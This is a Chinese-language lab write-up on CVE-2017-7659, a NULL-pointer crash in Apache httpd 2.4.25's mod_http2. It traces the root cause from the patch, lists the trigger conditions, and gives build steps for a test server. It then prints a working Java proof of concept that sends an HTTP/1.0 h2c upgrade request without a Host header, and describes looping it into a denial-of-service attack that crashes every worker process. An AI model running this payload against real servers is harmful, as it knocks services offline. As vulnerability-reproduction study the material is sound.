摘要：有漏洞的服務器源碼下載鏈接通過補丁的修改進行漏洞成因的逆向分析。我們編寫了的程序，同時發起多個畸形請求，以不斷觸發后臺崩潰，并讓服務器不斷陷入重新分配的處理之中。

apache在其網站發布的安全公告，針對CVE-2017-7659漏洞的介紹是這樣的：

A maliciously constructed HTTP/2 request could cause mod_http2 to dereference a NULL pointer and crashthe server process.

可以看到這是apache WEB服務器（httpd）中的一個HTTP 2.0協議處理的漏洞。

有漏洞的服務器源碼下載鏈接：https://archive.apache.org/di...
通過補丁的修改進行漏洞成因的逆向分析。首先查看漏洞函數h2_stream_set_request_rec，發現是調用h2_request_rcreat創建http 2.0請求的數據結構req，h2_request_rcreat執行失敗時req為空，此時在日志函數ap_log_rerror中直接解引用req導致進程崩潰：

繼續查看函數h2_request_rcreate，看到首先會把req置為0，然后判斷4個變量r->method，scheme，r->hostname，path，任何一個為空則返回失敗，而此時req還是0，就會導致進程崩潰：

那么這4個變量是哪一個為空導致的漏洞呢？scheme是先判斷了是否為空再賦值的，首先排除；path是從r->parsed_uri中解析出來，解析函數apr_uri_unparse在其它地方有多次使用，直覺path也不會為空；r->method保存請求的方法字段，在HTTP請求中必須存在，因此也不應該為空；因此只有r->hostname，保存請求的主機名，也就是域名，可能為空。

我們知道，HTTP請求中，有2個地方可以表示主機名：
1) 請求的路徑以完整URL方式表示，URL中包含主機名，例如GET http://www.example.com/ HTTP/1.1，這里主機名就是 www.example.com。服務器中是在ap_parse_uri函數中解析這種主機名的
2) 在Host請求頭中包含主機名，例如：
GET / HTTP/1.1
Host: www.example.com

服務器中是在fix_hostname函數中解析這種主機名的分別審計ap_parse_uri和fix_hostname函數，發現如果請求中沒有Host頭，那么r->hostname確實是空。但是服務器也考慮到了這種情況，在ap_read_request函數中做了判斷：

這里的判斷邏輯，如果滿足下面2個條件之一

1) r->hostname為空，且請求的HTTP版本大于等于1.1
2) 沒有Host頭，且請求的HTTP版本等于1.1
就會立刻回復400狀態碼的錯誤頁面，并不會觸發后面的漏洞。在注釋里也說明了，HTTP/1.1的RFC2616的14.23節中明確指明，HTTP/1.1請求必須包含Host頭。

但是，HTTP還有1.0版本，且HTTP/1.0和HTTP/1.1的處理流程一樣，雖然HTTP/1.0確實沒有規定請求必須包含Host頭。因此HTTP/1.0請求是可以沒有Host頭的，程序會一直按照流程執行，最終執行到h2_stream_set_request_rec函數，此時r->hostname為空，從而觸發漏洞。

綜合上面的分析，該漏洞利用成功需要如下條件：

1) 服務器支持HTTP/2
2) 請求是HTTP/1.0版本
3) 請求中沒有Host頭

安裝Sqllite
# wget http://www.sqlite.org/2014/sqlite-autoconf-3080704.tar.gz
# tar zxf sqlite-autoconf-3080704.tar.gz
# cd sqlite-autoconf-3080704
# ./configure --prefix=/usr/local/sqlite-3.8.7.4
# make && make install

安裝apr
# wget http://archive.apache.org/dist/apr/apr-1.5.2.tar.gz
# tar zxf apr-1.5.2.tar.gz
# cd apr-1.5.2
# ./configure --prefix=/usr/local/apr-1.5.2
# make && make install

安裝apr-util
# wget http://archive.apache.org/dist/apr/apr-util-1.5.4.tar.gz
# tar zxf apr-util-1.5.4.tar.gz
# cd apr-util-1.5.4
# ./configure --prefix=/usr/local/apr-util-1.5.4 --with-apr=/usr/local/apr-1.5.2
# make && make install

安裝nghttp2
# wget https://fossies.org/linux/www/nghttp2-1.38.0.tar.gz
# tar zxf nghttp2-1.38.0.tar.gz
# cd nghttp2-1.38.0
# ./configure --prefix=/usr/local/nghttp2-1.38.0
# make && make install

# 最后安裝2.4.25版本的Apache服務器
# cd /usr/local/src
# wget http://archive.apache.org/dist/httpd/httpd-2.4.25.tar.gz
# cd httpd-2.4.25
# ./configure --prefix=/usr/local/apache-2.4.25 --with-apr=/usr/local/apr-1.5.2  --with-apr=/usr/local/apr-1.5.2 --with-nghttp2=/usr/local/nghttp2-1.38.0  --enable-http2  --enable-dav  --enable-so --enable-maintainer-mod --enable-rewrite --with-sqlite=/usr/local/sqlite-3.8.7.4
# make && make install
# cp /usr/local/apache-2.4.25/conf/httpd.conf /usr/local/apache-2.4.25/conf/httpd.conf.default
# ln -s /usr/local/apache-2.4.25/  /usr/local/apache

1、設置服務器監聽的端口

2、Apache服務器的IP和端口

3、添加支持Http2.0的module

如果提示說沒有mod_http2.so，可以使用下面的命令編譯生成

/opt/httpd/httpd/bin/apxs -c mod_http2.c
/opt/httpd/httpd/bin/apxs -i -a -n http2 mod_http2.la
注：在下載的源碼modules文件夾那里執行

4、設置日志級別為debug，否則后續漏洞復現不了，因為如果不是debug級別，不會執行漏洞函數

5、啟動服務器

至此，實驗的環境已經搭建好。

訪問瀏覽器： 正常訪問

嘗試發送漏洞請求過去，觸發服務器的漏洞函數

public class HttpTest extends Thread{

    public void createSocket() {

    }

    public void communcate() throws IOException {
        // 注意這里必須制定請求方式 地址 注意空格
        Socket socket = new Socket("192.168.179.112", 8888);
        OutputStream os = socket.getOutputStream();
        InputStream is = socket.getInputStream();
        StringBuffer sb = new StringBuffer("GET / HTTP/1.0
");
        // 以下為請求頭
        sb.append("User-Agent: curl/7.50.1
");
        //sb.append("Host: 39.108.122.247
");
        sb.append("Accept: */*
");
        sb.append("Connection: Upgrade, HTTP2-Settings
");
        sb.append("Upgrade: h2c
");
        sb.append("HTTP2-Settings: AAMAAABkAARAAAAAAAIAAAAA
");
        //sb.append("Content-Length: 2
");
        // 注意這里要換行結束請求頭
        sb.append("
");
        System.out.println(sb.toString());
        try {
            os.write(sb.toString().getBytes());
            ByteArrayOutputStream baos = new ByteArrayOutputStream();
            /*byte[] bytes = new byte[1024];
            int len = -1;
            int i =0 ;
            while ((len = is.read(bytes)) != -1) {
                    baos.write(bytes, 0, len);
            }
            System.out.println(new String(baos.toByteArray()));
            */
            socket.close();
        } catch (IOException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }
    }

    @Override
    public void run() {
        createSocket();
        // Dos攻擊
        /*while (true) {
            try {
                communcate();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }*/


        try {
            communcate();
        } catch (IOException e) {
            e.printStackTrace();
        }

    }

    /*
    GET / HTTP/1.1
Connection: Upgrade, HTTP2-Settings
Upgrade: h2c
HTTP2-Settings: 
     */

    public static void main(String[] args) {
//        for(int i =0; i<100 ;++i) {
            HttpTest client = new HttpTest();
            client.start();
//        }
    }
}

漏洞成功復現：

此時瀏覽器也訪問不了

當worker進程崩潰時，apache會自動啟動新的worker進程。那么在真實的網絡環境中，黑客會如何利用此漏洞對服務器進行攻擊呢？
修改上面的Java代碼，發送Dos攻擊

apache 服務器全部worker進程都崩潰了！

這個實驗的難點是分析漏洞的發生原因、實驗環境的配置。首先，在linux上安裝Apache Http 2.4.25這個版本的服務器，參考網上的一些教程安裝，發現過程是不全的，只能靠自己去根據控制臺打印的錯誤日志去找原因，為了讓Apache服務器支持Http2.0，mod_http2.so這個module一直報錯，后來安裝配置了nghttp2重新編譯才能成功開啟服務器。安裝好實驗環境后，寫了一段Java程序去驗證，發送Http1.0的請求并且不帶Host消息頭，一開始創建了1000個線程發送1000個“惡意請求”，發現Apache服務器并沒有宕機，百思不得其解，調了一個下午都沒有成功，在隊友的電腦也是這樣的問題。之后不斷地查閱資料，并且嘗試去看源碼，發現需要在配置文件里面設置日志級別為debug才會觸發漏洞，默認是info級別，這點在官網上并沒有描述，這個服務器如果是沒有設置為debug級別是不會執行漏洞函數的，解決了這個大坑之后，服務器終于崩潰（出現了Segmentation fault這個段異常，即內部有空指針異常），但是Apache有保護機制，當worker進程崩潰時，apache會自動啟動新的worker進程。我們編寫了的程序，同時發起多個畸形請求，以不斷觸發后臺worker崩潰，并讓apache服務器不斷陷入重新分配worker的處理之中。基于漏洞發生的場景可以得出，解決這個漏洞的關鍵是就是增加了對h2_request_rcreate函數返回值的判斷即可。

參考鏈接：https://www.cnblogs.com/brish...
https://www.cnblogs.com/quche...
https://www.freebuf.com/vuls/...